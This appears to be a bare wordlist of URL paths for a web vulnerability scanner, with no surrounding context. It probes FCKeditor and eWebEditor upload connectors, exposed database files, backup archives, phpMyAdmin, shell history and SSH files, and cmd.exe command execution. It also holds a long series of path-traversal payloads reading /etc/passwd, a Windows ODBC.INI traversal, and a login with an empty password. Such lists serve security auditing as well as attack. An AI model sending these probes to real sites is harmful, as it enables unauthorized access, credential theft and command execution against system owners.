/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=d:/
/ckfinder/ckfinder.html
/robots.txt
/admin/FCKeditor/editor/filemanager/browser/default/connectors/test.html
/admin/FCKeditor/editor/filemanager/upload/test.html
/admin/FCKeditor/editor/filemanager/connectors/test.html
/admin/FCKeditor/editor/filemanager/connectors/uploadtest.html
/FCKeditor/editor/filemanager/browser/default/connectors/test.html
/FCKeditor/editor/filemanager/upload/test.html
/FCKeditor/editor/filemanager/connectors/test.html
/FCKeditor/editor/filemanager/connectors/uploadtest.html
/FCKeditor/_samples/default.html
/FCKeditor/_samples/asp/sample01.asp
/FCKeditor/_samples/asp/sample02.asp
/FCKeditor/_samples/asp/sample03.asp
/FCKeditor/_samples/asp/sample04.asp
/admin/FCKeditor/_samples/default.html
/admin/FCKeditor/_samples/asp/sample01.asp
/admin/FCKeditor/_samples/asp/sample02.asp
/admin/FCKeditor/_samples/asp/sample03.asp
/admin/FCKeditor/_samples/asp/sample04.asp
/FCKeditor/editor/filemanager/browser/default/browser.aspx
/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx
/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx1
/admin/FCKeditor/editor/filemanager/connectors/asp/connector.asp
/admin/FCKeditor/editor/filemanager/upload/test.aspx
/admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
/admin/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx
/admin/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx1
/fckeditor/editor/fckeditor.html
/admin/fckeditor/editor/fckeditor.html
/fckeditor/
/admin/fckeditor/
/www.rar
/phpmyadmin/
/phpadmin/
/database/%23mmdata.mdb
/editor/db/ewebeditor.mdb
/eWebEditor/db/ewebeditor.mdb
/struts/webconsole.html
/logs/
/service.asmx?wsdl
/CVS/Entries
/install.txt
/install/
/.bash_history
/.viminfo
/.ssh/known_hosts
/.svn/entries
/cmd.exe
/status
/script/wa.exe
/login.exe
/sf.rar
/bak.rar
/cmd.exe?/c+dir%20c:\/
/cmd.exe?/c+dir
/config.cgi
/admin.tar
/admin.tar.gz
/ckfinder/ckfinder.html
/xxx/
/nexus/
/../../../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/passwd
/../../../../../../../../../etc/passwd
/../../../../../../../../etc/passwd
/../../../../../../../etc/passwd
/../../../../../../etc/passwd
/../../../../../etc/passwd
/../../../../etc/passwd
/../../../etc/passwd
/../../etc/passwd
/../etc/passwd
/etc/passwd
/cgi-bin/licenses.cgi
/cgi-bin/licenses.cgi?p=system_nimda&a=LOGIN
/cgi-bin/frame.cgi?p=system_admin&a=LOGIN
/cgi-bin/frame.cgi
/bak.rar
/webroot.rar
/root.zip
/web.rar
/readme.txt
/123.rar
/wwwroot.rar
/1.rar
/wwwroot.zip
/www.zip
/web.zip
/date.tgz
/data/config.xml
/common/shell/BillBack.sh
/cgi-bin/webapp?op=_zj_orib_ilzxi_bafq_pelt&amp;method=edit&amp;rowid=ping'
/console/
/phpMyAdmin/
/../ver.txt
/../../../WINDOWS/ODBC.INI
/cgi-pub/exportdata.cgi?type=3&begintime=20140101&endtime=20990226
/cgi-pub/exportdata.cgi?type=1&begintime=20140101&endtime=20990226
/cgi-pub/exportdata.cgi?type=12&begintime=20150101&endtime=20990226
/editor/upload.html
/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise   